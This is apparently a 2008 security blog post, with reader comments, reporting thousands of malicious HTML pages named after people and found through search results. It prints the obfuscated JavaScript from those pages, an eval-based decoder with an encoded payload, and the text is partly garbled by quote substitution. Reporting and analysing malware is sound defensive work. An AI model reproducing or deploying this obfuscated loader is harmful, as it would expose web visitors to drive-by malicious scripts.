Skip navigation.

More malicious search results

One of my co-workers just learned that there is a malicious html page with his name on it! When I downloaded the page down we realized that it was not a targetted attack, but a variant of the malicious pages I reported under my MSN malicious results post.

This server actually had 3179 other html pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages. More information here...

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj=’SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0′;}var y;var OR=”;for(var vadz=0;vadz16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe(’2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS’);

have you

Tried to deobfuscate this yet ?


And it translates into:


See the full post here


Nice! is there an obfuscation engine? If it is, have you got the link?
Would you post the cached link from google?
Oh, hey ! This IS the engine! Isn't it?
pls try:
it's in german but i hope you will acknowledge, that's same thing we were talking about.

Big Tanks for posting this article.

"Vernichte ihn! Er ist nur ein USER!" (MCP)

redirection engine?

well, i tried htgp://

and i received:

Error: 'can't open redirects.log file'

HTTP/1.1 200 OK
Date: Wed, 30 Jul 2008 01:50:37 GMT
Server: Apache/2.2.8 (Fedora)
Connection: close
Content-Type: text/plain; charset=UTF-8

interesting thing.?
"Vernichte ihn! Er ist nur ein USER!" (MCP)